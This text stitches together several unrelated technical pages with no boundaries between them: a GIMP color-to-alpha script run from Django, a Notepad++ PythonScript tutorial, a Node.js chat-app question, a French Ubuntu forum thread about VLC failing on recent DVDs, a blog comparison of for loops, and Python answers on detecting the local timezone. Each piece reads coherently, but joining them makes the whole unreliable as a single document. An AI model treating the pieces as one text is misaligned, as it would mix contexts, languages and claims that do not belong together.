The common use case here is a user uploading a jpeg logo with a white/color background. It's (fairly) simple to switch the white pixels to transparent ones, but this leaves aliasing artifacts. An ideal solution would essentially "undo" the aliasing (given a known background color). At a minimum, the solution must beat the bg_removal script for ImageMagick (http://imagemagick.org/Usage/scripts/bg_removal). The "Color to Alpha" algorithm in GIMP looks like it does a pretty good job. The source is GPL and can be found here. A demonstration of what the GIMP algorithm does with something like a logo is here, and the GIMP manual page for Color-to-Alpha is here. It looks like the most straightforward way to do this programmatically would be to use GIMP batch mode. As promised, here's a working solution for the common white --> alpha use case. This is running on an Ubuntu 10.04.1 LTS server with the standard GIMP installation (2.6.8). from gimpfu import * def run(input_filepath): image = pdb.gimp_file_load(input_filepath, input_filepath) image.disable_undo() layer = image.active_layer if not layer.is_rgb: pdb.gimp_image_convert_rgb(image) white = gimpcolor.RGB(1.0, 1.0, 1.0, 1.0) bg_color = pdb.gimp_image_pick_color(image, layer, 0, 0, True, False, 0) if bg_color == white: pdb.plug_in_colortoalpha(image, layer, bg_color) layer_copy = layer.copy() image.add_layer(layer_copy) image.merge_visible_layers(CLIP_TO_IMAGE) pdb.file_png_save_defaults(image, image.active_layer, input_filepath, input_filepath) run('%(input_filepath)s') I execute this code from Python (within Django) using the subprocess module (code_as_string is the above code as a string, with input_filepath inserted: gimp_args = (settings.PATH_TO_GIMP, '-i', '--batch-interpreter=python-fu-eval', '-b', code_as_string, '-b', 'from gimpfu import pdb; pdb.gimp_quit(True)') environ = os.environ.copy() environ['GIMP2_DIRECTORY'] = settings.PATH_TO_GIMP_DIR p = subprocess.Popen(gimp_args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=environ) rc = p.wait() if rc: logging.error(p.stdout.read())
First: Go to the "Plugins" drop-down menu. Open the Plugins Manager. Download PythonScript for Notepad++. Via the prompt, restart Notepad++. Next: Go to Plugins in the drop-down menu. Click PythonScript->new script``. Save the script with a .py extension. Copy and paste this code, then edit it: #*** IMPORTS *** from Npp import * #*** DEFINITIONS *** #*** http://docs.python.org/release/1.4/tut/node70.html (.h triple-string variables)*** initial_string=""" THIS IS A HUGE STRING WITH COMMENTS AND FUNCTIONS AND NESTING varr MISSPELLEDD WORDS VARIABLES Varr ALL KINDS OF CRAZY STUFF""" #*** I am using a case-sensitive replacement; *** #*** therefore, I use two replacement operations *** #*** First replacement, lowercase *** print initial_string user_replacement_string=notepad.prompt(notepad, 'Replace', "") #*** Second replacement, uppercase *** editor.replace("varr", user_replacement_string) user_replacement_string=notepad.prompt(notepad, 'Replace', "") editor.replace("Varr", user_replacement_string) Save. Now, create a new file ctrl-n and test the script. Go to Plugins->PythonScript->Run Last Script. If it works, you can put it to action in the file you're working on. For convenience, I made ctrl-shift-e a shortcut key for the Run Previous Script (#yourscriptname.py) command. In your drop-down menu, go to Settings->Shortcut Mapper. Click the Plugin commands tab. Near the end, Run Previous Script. Very handy. Interestingly, you can use this script to duplicate itself for different patterns. I would really like to know how to make that possible. Please see the edit on my question. IMPORTANT EDIT The below code will make it so that your Notepad++ will create its own scripts. Run this script, and save the file in your c:/program files/Notepad++/plugins/config/PythonScript/scripts directory {Windows default}: #imports from Npp import * #variables pattern_string=notepad.prompt(notepad, 'Pattern String') number_of_replacements=int(notepad.prompt(notepad, 'Number of Replacements')) variable_to_replace = [] replacement_title = [] the_header = """#imports from Npp import * #definitions """ a = "pattern_string = """ + '"' + '""' + pattern_string + '""' + '"' b = """ print pattern_string user_replacement_string""" c = """=notepad.prompt(notepad, 'Replace', "Replaces: """ d = '"' + """) editor.replace(""" + '"' e = """", user_replacement_string""" f = ")" #function for i in range (0, number_of_replacements): replacement_title.append(str("Replacement Item ") + str(i+1)) variable_to_replace.append(notepad.prompt(notepad, replacement_title)) print the_header + a print b + str(i) + c + variable_to_replace[i] + d + variable_to_replace[i] + e + str(i) + f #thanks Wolfpack08. It will make it so that you can import strings that you often paste into your file, along with variables that you often have to replace. Write your input pattern with variables (i.e., This is my stupid input pattern foo and I use the common variable bar. When you run the script, you specify that input pattern in the first pop-up. You then specify the number of variables in the input pattern: foo and bar (e.g., "2" variables). In the resulting pop-up input boxes, you specify the variables in the order you would like to replace them in: ("foo", "bar"). I didn't put a 'default value' function in because I thought it would be annoying. I think it would be very useful to have default values for people who do a lot of data entry and need this kind of macro, though. If anyone makes a request for one, I will add it.
I'm writing a chat application. Firstly I had loaded my views via Ajax, but then I realized it isn't necessary, because I can use exports in express insted. I think it is a better solution but I don't know now how can I pass a variable from my login form to script.js. Passing username (username = req.body.user;) in rooms.js to server.js works, because I've got a proper name in console, which I typed in text input, but when I'm emitting 'test' to script.js nothing happens, I've nothing in my browser console. I suposse that the message in console appears for a moment and then the new view is loaded so it disappears. I tried to change the order of code but didn't help. Any sugestions? Am I doing something wrong ? I'm just beginning to learn node and express so I will be grateful for any help. server.js var express = require('express') , routes = require('./routes') , music = require('./routes/music') , art = require('./routes/art') , rooms = require('./routes/rooms') , http = require('http') , app = express() , server = http.createServer(app) , io = require('socket.io').listen(server) , path = require('path') , jade = require('jade') , mysql = require('mysql'); app.configure(function() { app.set('views', __dirname + '/views'); app.set('view engine', 'jade'); app.set("view options", {layout: false}); app.use(express.static(__dirname + '/public')); app.use(express.bodyParser()); app.use(app.router); }); app.get('/', routes.index); app.get('/music', music.rooms); app.get('/art', art.rooms); app.post('/rooms', rooms.rooms); io.sockets.on('connection', function(socket) { socket.on('joinRoom', function(data) { socket.username = username; socket.room = data.room; console.log('socket room and username in console' + socket.room+socket.username); socket.join(socket.room); socket.emit('test'); }); server.listen(3000); script.js var socket = io.connect(); $(document).ready(function() { $('#rooms').on('click', 'a', function() { var room = $(this).data('id'); socket.emit('joinRoom', {room: room}); }); socket.on('test', function(){ console.log('check if it works'); }); }); index.jade include header.jade div#page div(class="box") form(name="input", action='rooms', method="post") div p | Login: input(type="text", name="user", class="user") input(type="submit",class="submit",value="Login") rooms.jade include header.jade div#page div(class="box") div#rooms h2 Rooms a(data-name='abrakadabra', data-id='1', href='music') Abrakadabra a(data-name='aloha', data-id='2', href='art') Aloha rooms.js in routes folder exports.rooms = function(req, res){ res.render('rooms', { title: 'Rooms' }); username = req.body.user; }; music.js (one of the room) exports.rooms = function(req, res){ res.render('music', { title: 'Music room' }); };
eddy-14 DVD récents non lus en entier ! Bonjour Je suis sous ubuntu 13.10 Je viens de recevoir des DVD et VLC ne peut pas les lire. Plus précisément, ils font planter VLC quand le film commence (les pubs passent sans problème bizarrement). Ce n'est que pour les DVD récents, les autres ne posent pas de problème. J'ai déjà fait quelques recherches, mais presque rien n'a abouti. Par exemple, j'ai déjà essayé : sudo /usr/share/doc/libdvdread4/install-css.sh Mais ça ne donne rien. La seule solution pour le moment, c'est mplayer -nocache dvdnav:// Mais ça me paraît être de la bidouille... Y a-t-il une solution miracle que j'aurais loupé ? Merci... Hors ligne spinoziste Re : DVD récents non lus en entier ! Mplayer ? Nous mourrons tous . Hors ligne Coeur Noir Re : DVD récents non lus en entier ! Malheureusement cela reléverait d'une volonté des éditeurs de dvd qui apprécient peu qu'un logiciel libre et open-source passe outre leur(s) protection(s) : Hors ligne Korak Re : DVD récents non lus en entier ! Bonjour, Donne le retour complet de la commande: sudo apt-get update OS: Ubuntu 14.04 64 bits + Windows 8.1 64 bits en dualboot (BIOS UEFI, Secure Boot activé et table de partitions GPT) PC portable HP Pavilion g7-2335sb: Processeur: AMD A4-4300M APU Carte graphique: AMD Radeon HD 7420G Mémoire vive: 6 Go RAM Je suis Parrain-Linux Hors ligne eddy-14 Re : DVD récents non lus en entier ! @Cœur Noir Oui j'avais vu ces discussions, mais ça ne m'a pas vraiment aidé @Korak voici : eddy@acer-eddy:~$ sudo apt-get update [sudo] password for eddy: Ign http://dl.google.com stable InRelease Ign http://ppa.launchpad.net raring InRelease Ign http://extras.ubuntu.com saucy InRelease Réception de : 1 http://dl.google.com stable Release.gpg [198 B] Ign http://security.ubuntu.com saucy-security InRelease Ign http://archive.canonical.com saucy InRelease Ign http://fr.archive.ubuntu.com saucy InRelease Réception de : 2 http://extras.ubuntu.com saucy Release.gpg [72 B] Ign http://download.videolan.org InRelease Ign http://ppa.launchpad.net saucy InRelease Réception de : 3 http://dl.google.com stable Release [1 347 B] Réception de : 4 http://security.ubuntu.com saucy-security Release.gpg [933 B] Ign http://archive.canonical.com saucy InRelease Ign http://fr.archive.ubuntu.com saucy-updates InRelease Atteint http://extras.ubuntu.com saucy Release Atteint http://ppa.launchpad.net raring Release.gpg Atteint http://download.videolan.org Release.gpg Ign http://fr.archive.ubuntu.com saucy-backports InRelease Réception de : 5 http://security.ubuntu.com saucy-security Release [49,6 kB] Atteint http://archive.canonical.com saucy Release.gpg Atteint http://ppa.launchpad.net saucy Release.gpg Atteint http://download.videolan.org Release Ign http://fr.archive.ubuntu.com saucy-proposed InRelease Réception de : 6 http://dl.google.com stable/main i386 Packages [1 199 B] Atteint http://fr.archive.ubuntu.com saucy Release.gpg Atteint http://archive.canonical.com saucy Release.gpg Atteint http://extras.ubuntu.com saucy/main Sources Atteint http://download.videolan.org Packages Atteint http://ppa.launchpad.net raring Release Réception de : 7 http://fr.archive.ubuntu.com saucy-updates Release.gpg [933 B] Atteint http://archive.canonical.com saucy Release Atteint http://extras.ubuntu.com saucy/main i386 Packages Atteint http://ppa.launchpad.net saucy Release Ign http://linux.dropbox.com saucy InRelease Atteint http://fr.archive.ubuntu.com saucy-backports Release.gpg Réception de : 8 http://security.ubuntu.com saucy-security/main Sources [32,0 kB] Atteint http://archive.canonical.com saucy Release Atteint http://ppa.launchpad.net raring/main i386 Packages Réception de : 9 http://fr.archive.ubuntu.com saucy-proposed Release.gpg [933 B] Atteint http://archive.canonical.com saucy/partner Sources Atteint http://fr.archive.ubuntu.com saucy Release Réception de : 10 http://security.ubuntu.com saucy-security/restricted Sources [14 B] Réception de : 11 http://fr.archive.ubuntu.com saucy-updates Release [49,6 kB] Atteint http://archive.canonical.com saucy/partner i386 Packages Réception de : 12 http://security.ubuntu.com saucy-security/universe Sources [8 397 B] Réception de : 13 http://linux.dropbox.com saucy Release.gpg [489 B] Réception de : 14 http://security.ubuntu.com saucy-security/multiverse Sources [689 B] Atteint http://ppa.launchpad.net saucy/main i386 Packages Atteint http://fr.archive.ubuntu.com saucy-backports Release Réception de : 15 http://security.ubuntu.com saucy-security/main i386 Packages [89,6 kB] Réception de : 16 http://fr.archive.ubuntu.com saucy-proposed Release [49,6 kB] Atteint http://archive.canonical.com saucy/partner Sources Réception de : 17 http://linux.dropbox.com saucy Release [2 599 B] Atteint http://archive.canonical.com saucy/partner i386 Packages Atteint http://fr.archive.ubuntu.com saucy/main Sources Atteint http://fr.archive.ubuntu.com saucy/restricted Sources Réception de : 18 http://security.ubuntu.com saucy-security/restricted i386 Packages [14 B] Atteint http://fr.archive.ubuntu.com saucy/universe Sources Ign http://download.videolan.org Translation-fr_FR Réception de : 19 http://security.ubuntu.com saucy-security/universe i386 Packages [33,7 kB] Atteint http://fr.archive.ubuntu.com saucy/multiverse Sources Ign http://download.videolan.org Translation-fr Réception de : 20 http://security.ubuntu.com saucy-security/multiverse i386 Packages [1 388 B] Ign http://dl.google.com stable/main Translation-fr_FR Atteint http://fr.archive.ubuntu.com saucy/main i386 Packages Réception de : 21 http://linux.dropbox.com saucy/main i386 Packages [1 142 B] Ign http://download.videolan.org Translation-en Ign http://dl.google.com stable/main Translation-fr Ign http://extras.ubuntu.com saucy/main Translation-fr_FR Ign http://dl.google.com stable/main Translation-en Réception de : 22 http://security.ubuntu.com saucy-security/main Translation-en [49,2 kB] Ign http://extras.ubuntu.com saucy/main Translation-fr Atteint http://fr.archive.ubuntu.com saucy/restricted i386 Packages Ign http://extras.ubuntu.com saucy/main Translation-en Atteint http://fr.archive.ubuntu.com saucy/universe i386 Packages Atteint http://fr.archive.ubuntu.com saucy/multiverse i386 Packages Atteint http://security.ubuntu.com saucy-security/multiverse Translation-en Atteint http://fr.archive.ubuntu.com saucy/main Translation-fr Atteint http://fr.archive.ubuntu.com saucy/main Translation-en Atteint http://fr.archive.ubuntu.com saucy/multiverse Translation-fr Atteint http://fr.archive.ubuntu.com saucy/multiverse Translation-en Atteint http://security.ubuntu.com saucy-security/restricted Translation-en Atteint http://fr.archive.ubuntu.com saucy/restricted Translation-fr Atteint http://fr.archive.ubuntu.com saucy/restricted Translation-en Réception de : 23 http://security.ubuntu.com saucy-security/universe Translation-en [19,9 kB] Atteint http://fr.archive.ubuntu.com saucy/universe Translation-fr Atteint http://fr.archive.ubuntu.com saucy/universe Translation-en Réception de : 24 http://fr.archive.ubuntu.com saucy-updates/main Sources [73,1 kB] Réception de : 25 http://fr.archive.ubuntu.com saucy-updates/restricted Sources [14 B] Ign http://ppa.launchpad.net raring/main Translation-fr_FR Ign http://ppa.launchpad.net raring/main Translation-fr Ign http://ppa.launchpad.net raring/main Translation-en Réception de : 26 http://fr.archive.ubuntu.com saucy-updates/universe Sources [67,1 kB] Ign http://archive.canonical.com saucy/partner Translation-fr_FR Ign http://ppa.launchpad.net saucy/main Translation-fr_FR Réception de : 27 http://fr.archive.ubuntu.com saucy-updates/multiverse Sources [1 358 B] Ign http://archive.canonical.com saucy/partner Translation-fr Réception de : 28 http://fr.archive.ubuntu.com saucy-updates/main i386 Packages [204 kB] Ign http://archive.canonical.com saucy/partner Translation-en Ign http://ppa.launchpad.net saucy/main Translation-fr Ign http://archive.canonical.com saucy/partner Translation-fr_FR Réception de : 29 http://fr.archive.ubuntu.com saucy-updates/restricted i386 Packages [14 B] Ign http://ppa.launchpad.net saucy/main Translation-en Ign http://archive.canonical.com saucy/partner Translation-fr Réception de : 30 http://fr.archive.ubuntu.com saucy-updates/universe i386 Packages [155 kB] Ign http://archive.canonical.com saucy/partner Translation-en Réception de : 31 http://fr.archive.ubuntu.com saucy-updates/multiverse i386 Packages [1 763 B] Atteint http://fr.archive.ubuntu.com saucy-updates/main Translation-fr Réception de : 32 http://fr.archive.ubuntu.com saucy-updates/main Translation-en [96,3 kB] Atteint http://fr.archive.ubuntu.com saucy-updates/multiverse Translation-fr Atteint http://fr.archive.ubuntu.com saucy-updates/multiverse Translation-en Atteint http://fr.archive.ubuntu.com saucy-updates/restricted Translation-fr Atteint http://fr.archive.ubuntu.com saucy-updates/restricted Translation-en Atteint http://fr.archive.ubuntu.com saucy-updates/universe Translation-fr Réception de : 33 http://fr.archive.ubuntu.com saucy-updates/universe Translation-en [78,3 kB] Ign http://security.ubuntu.com saucy-security/main Translation-fr_FR Atteint http://fr.archive.ubuntu.com saucy-backports/main Sources Ign http://security.ubuntu.com saucy-security/main Translation-fr Atteint http://fr.archive.ubuntu.com saucy-backports/restricted Sources Ign http://security.ubuntu.com saucy-security/multiverse Translation-fr_FR Atteint http://fr.archive.ubuntu.com saucy-backports/universe Sources Ign http://security.ubuntu.com saucy-security/multiverse Translation-fr Atteint http://fr.archive.ubuntu.com saucy-backports/multiverse Sources Ign http://security.ubuntu.com saucy-security/restricted Translation-fr_FR Atteint http://fr.archive.ubuntu.com saucy-backports/main i386 Packages Ign http://security.ubuntu.com saucy-security/restricted Translation-fr Atteint http://fr.archive.ubuntu.com saucy-backports/restricted i386 Packages Atteint http://fr.archive.ubuntu.com saucy-backports/universe i386 Packages Ign http://security.ubuntu.com saucy-security/universe Translation-fr_FR Atteint http://fr.archive.ubuntu.com saucy-backports/multiverse i386 Packages Ign http://security.ubuntu.com saucy-security/universe Translation-fr Ign http://linux.dropbox.com saucy/main Translation-fr_FR Atteint http://fr.archive.ubuntu.com saucy-backports/main Translation-en Atteint http://fr.archive.ubuntu.com saucy-backports/multiverse Translation-en Ign http://linux.dropbox.com saucy/main Translation-fr Ign http://linux.dropbox.com saucy/main Translation-en Atteint http://fr.archive.ubuntu.com saucy-backports/restricted Translation-en Atteint http://fr.archive.ubuntu.com saucy-backports/universe Translation-en Réception de : 34 http://fr.archive.ubuntu.com saucy-proposed/restricted i386 Packages [14 B] Réception de : 35 http://fr.archive.ubuntu.com saucy-proposed/main i386 Packages [21,7 kB] Réception de : 36 http://fr.archive.ubuntu.com saucy-proposed/multiverse i386 Packages [14 B] Réception de : 37 http://fr.archive.ubuntu.com saucy-proposed/universe i386 Packages [35,8 kB] Atteint http://fr.archive.ubuntu.com saucy-proposed/main Translation-fr Réception de : 38 http://fr.archive.ubuntu.com saucy-proposed/main Translation-en [12,2 kB] Atteint http://fr.archive.ubuntu.com saucy-proposed/multiverse Translation-fr Atteint http://fr.archive.ubuntu.com saucy-proposed/multiverse Translation-en Atteint http://fr.archive.ubuntu.com saucy-proposed/restricted Translation-fr Atteint http://fr.archive.ubuntu.com saucy-proposed/restricted Translation-en Atteint http://fr.archive.ubuntu.com saucy-proposed/universe Translation-fr Réception de : 39 http://fr.archive.ubuntu.com saucy-proposed/universe Translation-en [17,0 kB] Ign http://fr.archive.ubuntu.com saucy/main Translation-fr_FR Ign http://fr.archive.ubuntu.com saucy/multiverse Translation-fr_FR Ign http://fr.archive.ubuntu.com saucy/restricted Translation-fr_FR Ign http://fr.archive.ubuntu.com saucy/universe Translation-fr_FR Ign http://fr.archive.ubuntu.com saucy-updates/main Translation-fr_FR Ign http://fr.archive.ubuntu.com saucy-updates/multiverse Translation-fr_FR Ign http://fr.archive.ubuntu.com saucy-updates/restricted Translation-fr_FR Ign http://fr.archive.ubuntu.com saucy-updates/universe Translation-fr_FR Ign http://fr.archive.ubuntu.com saucy-backports/main Translation-fr_FR Ign http://fr.archive.ubuntu.com saucy-backports/main Translation-fr Ign http://fr.archive.ubuntu.com saucy-backports/multiverse Translation-fr_FR Ign http://fr.archive.ubuntu.com saucy-backports/multiverse Translation-fr Ign http://fr.archive.ubuntu.com saucy-backports/restricted Translation-fr_FR Ign http://fr.archive.ubuntu.com saucy-backports/restricted Translation-fr Ign http://fr.archive.ubuntu.com saucy-backports/universe Translation-fr_FR Ign http://fr.archive.ubuntu.com saucy-backports/universe Translation-fr Ign http://fr.archive.ubuntu.com saucy-proposed/main Translation-fr_FR Ign http://fr.archive.ubuntu.com saucy-proposed/multiverse Translation-fr_FR Ign http://fr.archive.ubuntu.com saucy-proposed/restricted Translation-fr_FR Ign http://fr.archive.ubuntu.com saucy-proposed/universe Translation-fr_FR 1 158 ko réceptionnés en 11s (103 ko/s) Lecture des listes de paquets... Fait Hors ligne Korak Re : DVD récents non lus en entier ! Donne le retour complet de la commande: sudo apt-get upgrade OS: Ubuntu 14.04 64 bits + Windows 8.1 64 bits en dualboot (BIOS UEFI, Secure Boot activé et table de partitions GPT) PC portable HP Pavilion g7-2335sb: Processeur: AMD A4-4300M APU Carte graphique: AMD Radeon HD 7420G Mémoire vive: 6 Go RAM Je suis Parrain-Linux Hors ligne eddy-14 Re : DVD récents non lus en entier ! voici : eddy@acer-eddy:~$ sudo apt-get upgrade Lecture des listes de paquets... Fait Construction de l'arbre des dépendances Lecture des informations d'état... Fait Les paquets suivants seront mis à jour : file libgnutls-openssl27 libgnutls26 libmagic1 4 mis à jour, 0 nouvellement installés, 0 à enlever et 0 non mis à jour. Il est nécessaire de prendre 652 ko dans les archives. Après cette opération, 4 096 o d'espace disque seront libérés. Souhaitez-vous continuer [O/n] ? O Réception de : 1 http://fr.archive.ubuntu.com/ubuntu/ saucy-updates/main libgnutls-openssl27 i386 2.12.23-1ubuntu4.1 [21,8 kB] Réception de : 2 http://fr.archive.ubuntu.com/ubuntu/ saucy-updates/main libgnutls26 i386 2.12.23-1ubuntu4.1 [442 kB] Réception de : 3 http://fr.archive.ubuntu.com/ubuntu/ saucy-updates/main file i386 5.11-2ubuntu4.1 [18,1 kB] Réception de : 4 http://fr.archive.ubuntu.com/ubuntu/ saucy-updates/main libmagic1 i386 5.11-2ubuntu4.1 [171 kB] 652 ko réceptionnés en 1s (540 ko/s) (Lecture de la base de données... 338825 fichiers et répertoires déjà installés.) Préparation du remplacement de libgnutls-openssl27:i386 2.12.23-1ubuntu4 (en utilisant .../libgnutls-openssl27_2.12.23-1ubuntu4.1_i386.deb) ... Dépaquetage de la mise à jour de libgnutls-openssl27:i386 ... Préparation du remplacement de libgnutls26:i386 2.12.23-1ubuntu4 (en utilisant .../libgnutls26_2.12.23-1ubuntu4.1_i386.deb) ... Dépaquetage de la mise à jour de libgnutls26:i386 ... Préparation du remplacement de file 5.11-2ubuntu4 (en utilisant .../file_5.11-2ubuntu4.1_i386.deb) ... Dépaquetage de la mise à jour de file ... Préparation du remplacement de libmagic1:i386 5.11-2ubuntu4 (en utilisant .../libmagic1_5.11-2ubuntu4.1_i386.deb) ... Dépaquetage de la mise à jour de libmagic1:i386 ... Traitement des actions différées (« triggers ») pour « man-db »... Paramétrage de libgnutls26:i386 (2.12.23-1ubuntu4.1) ... Paramétrage de libgnutls-openssl27:i386 (2.12.23-1ubuntu4.1) ... Paramétrage de libmagic1:i386 (5.11-2ubuntu4.1) ... Paramétrage de file (5.11-2ubuntu4.1) ... Traitement des actions différées (« triggers ») pour « libc-bin »... au cas où j'ai testé à nouveau après ces mises à jour, mais ça plante toujours au même endroit. Hors ligne Korak Re : DVD récents non lus en entier ! Peut-être que le paquet libdvdcss2 n'arrive pas a décoder ces DVD récents. OS: Ubuntu 14.04 64 bits + Windows 8.1 64 bits en dualboot (BIOS UEFI, Secure Boot activé et table de partitions GPT) PC portable HP Pavilion g7-2335sb: Processeur: AMD A4-4300M APU Carte graphique: AMD Radeon HD 7420G Mémoire vive: 6 Go RAM Je suis Parrain-Linux Hors ligne Coeur Noir Re : DVD récents non lus en entier ! A tester : les mises à jour de libdvdnav4 (sous 12.04 du moins) d'aujourd'hui sont susceptibles de règler ces problèmes... Du coup je suis allé chercher la libdvdnav4 de trusty pour l'installer sous 13.10 et cela semble résoudre le pépin pour mes dvd de ...StarWars. Dernière modification par Coeur Noir (Le 09/03/2014, à 14:38) Hors ligne
If you have to learn a new programming language it is most of the time quite easy. You know the structures and the way you have to think if you want to solve a problem. The first time it might be hard, but the more languages you learn the more simmilarities you'll recognize. I also have to learn a special variant of pseudocode at the moment. It is quite hard to know what pseudocode does if it isn't unambiguously defined. I had problems with for loops for example. For loops have some properties you simply have to define: Scoping: Does the loop counter still exist after the loop was executed? Copy or reference: Does the loop statement work with a copy or with a reference of the variables in the loop body? Last value of i: What is the last value of i? Contents General structure A for loop usually consists of an initialisation part, a condition and an interation step: Pythons special strutcure Python uses a generator or lists to loop: #!/usr/bin/python # -*- coding: utf-8 -*- for i in xrange(0, 10): print("In loop: %i" % i) print("Out of loop: %i" % i) Scoping Does the loop counter still exist after the loop was executed? Yes: JavaScript, PHP, Python No: C, C++, Java Copy or reference Does the loop statement work with a copy or with a reference of the variables in the loop body? Does the programming language use the same variable as in the for condition (reference) or does it use another one (copy)? You can test this if you add something to i in the body. Copy: Python Reference: C, C++, Java, JavaScript, PHP Python iterates over a generator. This means that you can't really compare Pythons for-loop to other programming languages' for loops. Last value of i What is the last value of i? 9: C, C++, Java (Inside the loop), Python (Outside of the loop)10: JavaScript, PHP (Outside of the loop) foreach Many languages provide a special for loop. This special for loop is sometimes called "foreach" as you iterate over each element in a collection (e.g. an array). Java int[] array = new int[5]; array[0] = 0; array[1] = 1; array[2] = 2; array[3] = 3; array[4] = 4; for (int item: array) { System.out.println("Foreach: " + item); } JavaScript var array = new Array(0, 1, 2, 3, 4); for (var value in array) { document.write('Foreach: ' + value + '<br/>' ); } PHP $array = array(0, 1, 2, 3, 4); foreach ($array as $key=>$value) { echo "Foreach: $value<br/>"; } Python array = [0, 1, 2, 3, 4] for value in array: print "Foreach: %i" % value More information If you want to see the code, you can download this zip archive. It is quite astonishing, but Wikipedia has a very long article about for loops.
This is the value overridden via TZ, by symlinking /etc/localtime, or setting a TIMEZONE variable in time-related system configuration files. I think best bet is to go thru all pytz timezones and check which one matches local timezone, each pytz timezone object contains info about utcoffset and tzname like CDT, EST, same info about local time can be obtained from import time import pytz import datetime local_names = [] if time.daylight: local_offset = time.altzone localtz = time.tzname[1] else: local_offset = time.timezone localtz = time.tzname[0] local_offset = datetime.timedelta(seconds=-local_offset) for name in pytz.all_timezones: timezone = pytz.timezone(name) if not hasattr(timezone, '_tzinfos'): continue#skip, if some timezone doesn't have info # go thru tzinfo and see if short name like EDT and offset matches for (utcoffset, daylight, tzname), _ in timezone._tzinfos.iteritems(): if utcoffset == local_offset and tzname == localtz: local_names.append(name) print local_names output: In production you can create such a mapping beforehand and save it instead of iterating always. Testing script after changing timezone: One problem is that there are multiple "pretty names" , like "Australia/Sydney" , which point to the same time zone (e.g. CST). So you will need to get all the possible names for the local time zone, and then select the name you like. e.g.: for Australia, there are 5 time zones, but way more time zone identifiers: "Australia/Lord_Howe", "Australia/Hobart", "Australia/Currie", "Australia/Melbourne", "Australia/Sydney", "Australia/Broken_Hill", "Australia/Brisbane", "Australia/Lindeman", "Australia/Adelaide", "Australia/Darwin", "Australia/Perth", "Australia/Eucla" you should check if there is a e.g.: and in Python you can do: from pytz import timezone import pytz In [56]: pytz.country_timezones('AU') Out[56]: [u'Australia/Lord_Howe', u'Australia/Hobart', u'Australia/Currie', u'Australia/Melbourne', u'Australia/Sydney', u'Australia/Broken_Hill', u'Australia/Brisbane', u'Australia/Lindeman', u'Australia/Adelaide', u'Australia/Darwin', u'Australia/Perth', u'Australia/Eucla'] but the API for Python seems to be pretty limited, e.g. it doesn't seem to have a call like Ruby's This is kind of cheating, I know, but getting from >>> import os >>> '/'.join(os.readlink('/etc/localtime').split('/')[-2:]) 'Australia/Sydney' Hope it helps. #!/usr/bin/env python from hashlib import sha224 import os def get_current_olsonname(): tzfile = open('/etc/localtime') tzfile_digest = sha224(tzfile.read()).hexdigest() tzfile.close() for root, dirs, filenames in os.walk("/usr/share/zoneinfo/"): for filename in filenames: fullname = os.path.join(root, filename) f = open(fullname) digest = sha224(f.read()).hexdigest() if digest == tzfile_digest: return '/'.join((fullname.split('/'))[-2:]) f.close() return None if __name__ == '__main__': print get_current_olsonname() If evaluating > md5sum /etc/localtime abcdefabcdefabcdefabcdefabcdefab /etc/localtime > find /usr/share/zoneinfo -type f |xargs md5sum | grep abcdefabcdefabcdefabcdefabcdefab abcdefabcdefabcdefabcdefabcdefab /usr/share/zoneinfo/Europe/London abcdefabcdefabcdefabcdefabcdefab /usr/share/zoneinfo/posix/Europe/London ... The duplicates could be filtered using only the official region names "Europe", "America" ... If there are still duplicates, you could take the shortest name :-) import pytz import time #import locale import urllib2 yourOlsonTZ = None #yourCountryCode = locale.getdefaultlocale()[0].split('_')[1] yourCountryCode = urllib2.urlopen('http://api.hostip.info/country.php').read() for olsonTZ in [pytz.timezone(olsonTZ) for olsonTZ in pytz.all_timezones]: if (olsonTZ._tzname in time.tzname) and (str(olsonTZ) in pytz.country_timezones[yourCountryCode]): yourOlsonTZ = olsonTZ break print yourOlsonTZ This code will take a best-guess crack at your Olson Timezone based both on your Timezone Name (as according to Python's For example, simply matching the Timzone Names could result in However, if your country is Canada, the script will simply default to the topmost Canadian result ( This will get you the time zone name, according to what's in the TZ variable, or localtime file if unset: #! /usr/bin/env python import time time.tzset print time.tzname The tzlocal module for Python is aimed at exactly this problem. It produces consistent results under both Linux and Windows, properly converting from Windows time zone ids to Olson using the CLDR mappings. I prefer following a slightly better than poking around _xxx values import time, pytz, os cur_name=time.tzname cur_TZ=os.environ.get("TZ") def is_current(name): os.environ["TZ"]=name time.tzset() return time.tzname==cur_name print "Possible choices:", filter(is_current, pytz.all_timezones) # optional tz restore if cur_TZ is None: del os.environ["TZ"] else: os.environ["TZ"]=cur_TZ time.tzset() Here's another posibility, using PyICU instead; which is working for my purposes: >>> from PyICU import ICUtzinfo >>> from datetime import datetime >>> datetime(2012, 1, 1, 12, 30, 18).replace(tzinfo=ICUtzinfo.getDefault()).isoformat() '2012-01-01T12:30:18-05:00' >>> datetime(2012, 6, 1, 12, 30, 18).replace(tzinfo=ICUtzinfo.getDefault()).isoformat() '2012-06-01T12:30:18-04:00' Here it is interpreting niave datetimes (as would be returned by a database query) in the local timezone. I changed tcurvelo's script to find the right form of time zone (Continent/..../City), in most of cases, but return all of them if fails #!/usr/bin/env python from hashlib import sha224 import os from os import listdir from os.path import join, isfile, isdir infoDir = '/usr/share/zoneinfo/' def get_current_olsonname(): result = [] tzfile_digest = sha224(open('/etc/localtime').read()).hexdigest() test_match = lambda filepath: sha224(open(filepath).read()).hexdigest() == tzfile_digest def walk_over(dirpath): for root, dirs, filenames in os.walk(dirpath): for fname in filenames: fpath = join(root, fname) if test_match(fpath): result.append(tuple(root.split('/')[4:]+[fname])) for dname in listdir(infoDir): if dname in ('posix', 'right', 'SystemV', 'Etc'): continue dpath = join(infoDir, dname) if not isdir(dpath): continue walk_over(dpath) if not result: walk_over(join(infoDir)) return result if __name__ == '__main__': print get_current_olsonname() This JavaScript project attempts to solve the same issue in the browser client-side. It works by playing "twenty questions" with the locale, asking for the UTC offset of certain past times (to test for summer time boundaries, etc.) and using those results to deduce what the local time zone must be. I am not aware of any equivalent Python package unfortunately, so if someone wanted to use this solution it would have to be ported to Python. While this formula will require updating every time (at worst) the TZ database is updated, a combination of this algorithm and the solution proposed by Anurag Uniyal (keeping only possibilities returned by both methods) sounds to me like the surest way to compute the effective local timezone. As long as there is some difference between the UTC offset of at least one local time in any two time zones, such a system can correctly choose between them.
